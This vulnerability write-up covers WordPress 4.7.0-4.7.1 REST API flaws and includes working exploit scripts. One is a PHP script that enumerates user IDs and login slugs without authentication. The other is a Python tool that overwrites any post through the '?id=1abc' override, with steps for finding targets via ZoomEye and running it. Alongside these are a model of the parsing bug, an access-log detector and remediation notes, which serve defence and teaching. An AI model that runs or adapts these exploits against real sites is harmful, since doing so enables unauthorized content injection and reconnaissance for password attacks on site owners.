Research on the WordPress 4.7.0-4.7.1 content injection vulnerability
I. Obtaining users
1. Impact: unauthenticated disclosure of the usernames and IDs of every user who has published a post
2. Trigger prerequisite: the WordPress REST API is reachable (it ships in core and is enabled by default from 4.7)
3. Affected versions: WordPress 4.7 and later expose this endpoint (earlier versions only if the WP REST API plugin is installed). This listing is by design and was not changed by the 4.7.2 update, so it remains a useful reconnaissance step.
4. Description: a plain GET request, with no authentication at all, passes the permission check in wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php (get_items_permissions_check() returns true for the default 'view' context), so the controller runs the user query and the REST API returns the result as JSON. Some information about every user who has published a post is disclosed; the slug is normally derived from the login name, which makes it directly useful for password guessing. Request address: http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
5. Exploit:
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: [email protected]
#Site: https://mateuslino.tk
header('Content-type: text/html; charset=UTF-8');
$url = "http://xxxx.cn/";          // target site root, with trailing slash
$payload = "wp-json/wp/v2/users/"; // REST users collection, readable without authentication
// A plain GET is enough: the endpoint lists every user who has published a post
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if ($json) {
    echo "*-----------------------------*\n";
    foreach ($json as $users) {
        echo "[*] ID : |" .$users['id'] ."|\n";
        echo "[*] Name: |" .$users['name'] ."|\n";
        echo "[*] User :|" .$users['slug'] ."|\n"; // slug is usually the login name
        echo "\n";
    }
    echo "*-----------------------------*";
} else {
    echo "[*] No user";
}
?>
6. Result: (screenshot not reproduced here)
II. Modifying arbitrary posts without authorization
1. Impact: unauthenticated modification of the content of any existing post or page (content injection)
2. Trigger prerequisite: the WordPress REST API is reachable
3. Affected versions: WordPress 4.7.0-4.7.1
4. Description: the posts endpoint of the REST API accepts an id parameter from the query string, and that value takes precedence over the numeric id matched from the route /wp/v2/posts/(?P<id>[\d]+). For a value such as 1abc, get_post() finds no post (WP_Post::get_instance() rejects non-numeric IDs), so update_item_permissions_check() never reaches the capability test and returns true. update_item() then casts the same value with (int), which yields 1, and writes the supplied fields to the real post 1. An unauthenticated attacker can therefore overwrite the content of any post whose ID they know.
5. Exploit:
import json
import sys
import urllib.request
from lxml import etree


def get_api_url(wordpress_url):
    # The front page advertises the REST API root in a <link rel="https://api.w.org/"> tag
    response = urllib.request.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u


def get_posts(api_base):
    # Listing published posts needs no authentication and tells us which IDs exist
    response = urllib.request.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())
    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    }).encode('utf-8')
    # The trick: the query-string id ("1abc") overrides the numeric route id. get_post()
    # finds no post for the non-numeric value, so the permission check is skipped, and
    # update_item() then casts the value with (int), which lands on the real post.
    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib.request.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib.request.urlopen(req).read()
    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':
    # ensure we have at least a url
    # if we have a post id, we need content too
    if len(sys.argv) < 2 or len(sys.argv) == 3:
        print_usage()
        sys.exit(1)

    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))

    # if we only have a url, show the posts we have
    if len(sys.argv) == 2:
        print('* Found the following posts:')
        get_posts(api_url)
        sys.exit(0)

    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.read()
    update_post(api_url, sys.argv[2], new_content)
    print('* Update complete!')
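To make the id-handling mismatch concrete, the following Python model is added for this write-up; it is not code from WordPress core or from the exploit's author. It imitates the relevant pieces of the 4.7.1 posts controller: the permission check calls get_post() on the raw id parameter (where a non-numeric value yields no post), while the update casts the same parameter with PHP's (int). The POSTS table, the helper names and the status strings are constructed for the example; fixed_update() models the 4.7.2 change of declaring id as an integer argument that is validated before any lookup.

```python
import re

# Constructed stand-in for the target's posts table: post ID -> content.
POSTS = {1: "Hello world!", 2: "Sample Page"}


def php_is_numeric(value):
    """Approximate PHP is_numeric(): the whole string must be a number."""
    return re.fullmatch(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?", value) is not None


def php_int_cast(value):
    """Approximate PHP's (int) cast on a string: leading integer digits, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def get_post(post_id):
    """Model of get_post(): WP_Post::get_instance() rejects non-numeric IDs."""
    if not php_is_numeric(post_id):
        return None
    return POSTS.get(php_int_cast(post_id))


def vulnerable_update(route_id, query_id, new_content, authenticated=False):
    """4.7.1 behaviour: a query-string 'id' overrides the numeric route 'id'."""
    request_id = query_id if query_id is not None else route_id
    # update_item_permissions_check(): only enforced when get_post() finds a post
    post = get_post(request_id)
    if post is not None and not authenticated:
        return "403 rest_cannot_edit"
    # update_item(): the same parameter is cast with (int), so "1abc" becomes 1
    target = php_int_cast(request_id)
    if target not in POSTS:
        return "404 rest_post_invalid_id"
    POSTS[target] = new_content
    return "200 updated post %d" % target


def fixed_update(route_id, query_id, new_content, authenticated=False):
    """4.7.2 behaviour: 'id' is declared as an integer argument and validated first."""
    request_id = query_id if query_id is not None else route_id
    if not re.fullmatch(r"\d+", request_id):
        return "400 rest_invalid_param"
    post = get_post(request_id)
    if post is None:
        return "404 rest_post_invalid_id"
    if not authenticated:
        return "403 rest_cannot_edit"
    POSTS[int(request_id)] = new_content
    return "200 updated post %d" % int(request_id)


if __name__ == "__main__":
    print(vulnerable_update("1", "1abc", "defaced"))  # unauthenticated, yet post 1 changes
    print(fixed_update("1", "1abc", "defaced"))       # rejected before any lookup
```

The lesson generalises beyond this bug: whenever an authorization check and the privileged operation each parse the same untrusted parameter independently, any difference between the two parsers is a bypass. Canonicalise once, validate, and pass the canonical value to both.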
6. Testing the vulnerability:
6.1 First find a target host with ZoomEye.
6.2 Note: create a file named content in the same directory as the script test.py and put the replacement post content in it.
Run the script: python test.py url 1 content (url is the attack target and is not given here)
PS: this script is best run on Linux; on Windows it needs some adjustment.
7. Final result: (screenshot not reproduced here)
8. Remediation: upgrade to the latest WordPress. The content injection was fixed in 4.7.2, which declares the route's id argument as an integer so that values like 1abc are rejected before the permission check runs.
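Besides upgrading, it is worth looking back through web server access logs for exploitation attempts. The following detector is an added example, not part of the original write-up: it parses combined-format access log lines (the sample lines are constructed, not from a real server) and flags write requests to the posts route whose query-string id is not a pure integer, covering both the pretty-permalink path and the ?rest_route= form used when permalinks are disabled.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-format access log line, e.g.
# 203.0.113.5 - - [01/Feb/2017:10:00:02 +0000] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 812
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Pretty-permalink route and the ?rest_route= form used when permalinks are off
PATH_ROUTE_RE = re.compile(r"/wp-json/wp/v2/posts/(?P<id>\d+)/?$")
REST_ROUTE_RE = re.compile(r"^/wp/v2/posts/(?P<id>\d+)/?$")


def suspicious_post_id(request_target):
    """Return the routed post ID when a query-string 'id' is present but not a pure integer."""
    parts = urlsplit(request_target)
    query = parse_qs(parts.query, keep_blank_values=True)
    m = PATH_ROUTE_RE.search(parts.path)
    if not m and "rest_route" in query:
        m = REST_ROUTE_RE.match(query["rest_route"][0])
    if not m:
        return None
    for qid in query.get("id", []):
        if not re.fullmatch(r"\d+", qid):
            return m.group("id")
    return None


def scan(lines):
    """Return (ip, timestamp, post_id, status) for write requests carrying an id override."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") not in ("POST", "PUT", "PATCH"):
            continue
        post_id = suspicious_post_id(m.group("target"))
        if post_id is not None:
            hits.append((m.group("ip"), m.group("ts"), post_id, int(m.group("status"))))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Feb/2017:10:00:01 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Feb/2017:10:00:02 +0000] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Feb/2017:10:05:00 +0000] "POST /?rest_route=/wp/v2/posts/3&id=3%27 HTTP/1.1" 200 640',
    '192.0.2.9 - - [01/Feb/2017:10:06:00 +0000] "POST /wp-json/wp/v2/posts/2 HTTP/1.1" 401 120',
    '192.0.2.9 - - [01/Feb/2017:10:07:00 +0000] "POST /wp-json/wp/v2/posts/2/?id=2 HTTP/1.1" 401 120',
]

if __name__ == "__main__":
    for ip, ts, post_id, status in scan(SAMPLE_LOG):
        print("%s %s post %s -> HTTP %d" % (ip, ts, post_id, status))
```

A 200 on a flagged request points to a successful injection on an unpatched 4.7.0/4.7.1 install; a patched site answers such a request with 400 (rest_invalid_param). The check is necessarily partial: the overriding id can equally be sent as a form field or in the JSON body, which access logs do not record, so catching that variant needs a WAF rule or application-level request logging.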
9. Summary: unauthorized operations caused by API flaws deserve attention, and future vulnerability research should pay more attention to this class of bug. As for the code, from a quick look the unauthorized operation comes down to a logic error on the developers' side: the permission check and the update interpret the same parameter differently.